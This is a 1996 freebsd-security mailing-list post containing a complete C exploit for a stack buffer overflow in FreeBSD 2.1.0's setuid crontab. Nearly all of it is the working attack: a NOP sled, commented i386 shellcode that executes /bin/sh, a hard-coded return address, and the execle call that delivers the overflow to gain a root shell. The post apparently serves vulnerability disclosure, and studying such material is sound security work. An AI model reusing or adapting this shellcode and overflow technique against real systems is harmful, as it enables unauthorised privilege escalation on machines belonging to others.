Date:      Mon, 16 Dec 1996 13:04:33 +0300 (MSK)
From:      Dmitry Valdov <dv@kis.ru>
To:        freebsd-security@freebsd.org
Subject:   crontab security hole exploit
Message-ID:  <Pine.FBSD.3.95.961216130323.14404A-100000@xkis.kis.ru>

Hello!

Exploit for the stack buffer overflow in crontab (FreeBSD 2.1.0, i386). The stack address and buffer offsets hard-coded in the program below are specific to that build and must be re-derived for any other one.


/* ---------------------------- CUT HERE ----------------------------------- */
/*                                                                           */
/*                                 Hi !                                      */
/*   This is a buffer-overflow exploit for the crontab bug (FreeBSD 2.1.0).  */
/*           If you have any problems with it, drop me a letter.             */
/*                              Have fun !                                   */
/*                                                                           */
/*                                                                           */
/*                         ----------------------                            */
/*             ---------------------------------------------                 */
/*  -----------------   Dedicated to my beautiful lady   ------------------  */
/*             ---------------------------------------------                 */
/*                         ----------------------                            */
/*                                                                           */
/*         Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su        */

#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
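/*
 * Store a 32-bit value as four little-endian bytes.
 *
 * The target is i386, so pointers embedded in the payload must be
 * little-endian regardless of the host the exploit is built on.  The
 * original code stored an `unsigned long` through a cast pointer, which
 * is host-order, misaligned, and 8 bytes wide on LP64 hosts (overrunning
 * the 353-byte buffer at offset 348).
 */
static void put_le32(char *dst, uint32_t v)
{
    dst[0] = (char)(v & 0xffu);
    dst[1] = (char)((v >> 8) & 0xffu);
    dst[2] = (char)((v >> 16) & 0xffu);
    dst[3] = (char)((v >> 24) & 0xffu);
}

/*
 * Build the oversized crontab argument and exec /usr/bin/crontab with it.
 *
 * Layout of param_string (PARAM_LEN = 353 bytes, NUL-terminated):
 *   [0..199]    0x90 NOP sled
 *   [200..274]  code_string (75 bytes, see below)
 *   [275..347]  more 0x90 NOPs
 *   [348..351]  start_addr, little-endian: the value that lands on the
 *               saved return address in crontab's stack frame
 *   [352]       '\0'
 *
 * start_addr (0xefbfddf0) and the offsets 200/348 were derived by the
 * author for the FreeBSD 2.1.0/i386 crontab binary; they are not valid
 * for any other build.  The payload travels through argv as a C string,
 * so it must contain no NUL byte: the "\x01" placeholders are patched to
 * 0 at run time by the geteip routine, and start_addr itself must not
 * contain a zero byte.
 *
 * Returns 1 (after perror) if the exec fails; never returns on success.
 */
int main(void)
{
    enum { PARAM_LEN = 353, CODE_OFF = 200, RET_OFF = 348 };

    /* Empty environment: presumably to keep crontab's stack layout, and
     * therefore start_addr, predictable - confirm against the target. */
    char *env[] = { NULL };
    char param_string[PARAM_LEN];
    const uint32_t start_addr = 0xefbfddf0u;

    /*
     * Position-independent i386 payload.  Control flow: jmp cont ->
     * movl $start_addr,%esp (relocate the stack to the known address) ->
     * call geteip -> geteip pops its return address into %ebp, uses it to
     * patch the "\x01"/"\xff" placeholders below to zero, and returns ->
     * three pushes build the execve argument frame -> call execve ->
     * leal loads syscall number 0x3b into %eax and lcall $7,$0 enters the
     * FreeBSD syscall gate.
     *
     * Offsets from the payload start (relative to %ebp = offset 55 inside
     * geteip): 23 = "/bin/sh" (%ebp-0x20), 30 = its terminator
     * (%ebp-0x19), 34..36 = high bytes of the leal displacement
     * (%ebp-0x15..-0x13), 38..41 = lcall offset (%ebp-0x11), 43 = high
     * byte of the lcall selector (%ebp-0x0c).  After patching, offset 38
     * holds four zero bytes; the pushes point argv and envp at it, so the
     * call is execve("/bin/sh", {NULL}, {NULL}).
     *
     * Not const: "XXXX" at offset 46 is overwritten with start_addr.
     */
    char code_string[] =
        "\xeb\x2a"                         /* jmp    cont               */

/* geteip: */
        "\x5d"                             /* popl   %ebp               */
        "\x55"                             /* pushl  %ebp               */
        "\xfe\x4d\xe7"                     /* decb   0xffffffe7(%ebp)   -> NUL-terminate "/bin/sh" */
        "\xfe\x4d\xeb"                     /* decb   0xffffffeb(%ebp)   -> leal disp byte 1 := 0 */
        "\xfe\x4d\xec"                     /* decb   0xffffffec(%ebp)   -> leal disp byte 2 := 0 */
        "\xfe\x4d\xed"                     /* decb   0xffffffed(%ebp)   -> leal disp byte 3 := 0 */
        "\xff\x45\xef"                     /* incl   0xffffffef(%ebp)   -> lcall offset 0xffffffff := 0 */
        "\xfe\x4d\xf4"                     /* decb   0xfffffff4(%ebp)   -> lcall selector 0x0107 := 0x0007 */
        "\xc3"                             /* ret                       */

/* 0xffffffe0(%ebp): */
        "/bin/sh"
/* 0xffffffe7(%ebp): */
        "\x01"                             /* becomes the '\0' after /bin/sh */

/* execve: */
        "\x8d\x05\x3b\x01\x01\x01"         /* leal   0x3b,%eax  (after patch; 0x3b = execve, per the label) */
        "\x9a\xff\xff\xff\xff\x07\x01"     /* lcall  0x7,0x0    (after patch) */

/* cont: */
        "\xc7\xc4XXXX"                     /* movl   $0xXXXXXXXX,%esp   (XXXX := start_addr) */
        "\xe8\xcb\xff\xff\xff"             /* call   geteip             */
        "\x81\xc5\xef\xff\xff\xff"         /* addl   $0xffffffef,%ebp   -> %ebp = &zero word (offset 38) */
        "\x55"                             /* pushl  %ebp               (envp) */
        "\x55"                             /* pushl  %ebp               (argv) */
        "\x81\xc5\xf1\xff\xff\xff"         /* addl   $0xfffffff1,%ebp   -> %ebp = &"/bin/sh" (offset 23) */
        "\x55"                             /* pushl  %ebp               (path) */
        "\xe8\xd4\xff\xff\xff";            /* call   execve             */

    /* NOP sled everywhere the payload and the return address do not go. */
    memset(param_string, '\x90', PARAM_LEN - 1);
    param_string[PARAM_LEN - 1] = '\0';

    /* Patch the stack-relocation immediate inside the payload. */
    char *slot = strstr(code_string, "XXXX");
    if (slot == NULL) {
        fputs("payload placeholder \"XXXX\" not found\n", stderr);
        return 1;
    }
    put_le32(slot, start_addr);

    /* The payload has no NUL bytes, so strlen() is its full length. */
    size_t code_len = strlen(code_string);
    if (CODE_OFF + code_len > RET_OFF) {
        fputs("payload does not fit before the return-address slot\n", stderr);
        return 1;
    }
    memcpy(&param_string[CODE_OFF], code_string, code_len);

    /* Overwrite the saved return address with a pointer into the sled. */
    put_le32(&param_string[RET_OFF], start_addr);

    execle("/usr/bin/crontab", "/usr/bin/crontab", param_string,
           (char *)NULL, env);
    perror("execle");
    return 1;
}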



Dmitry.



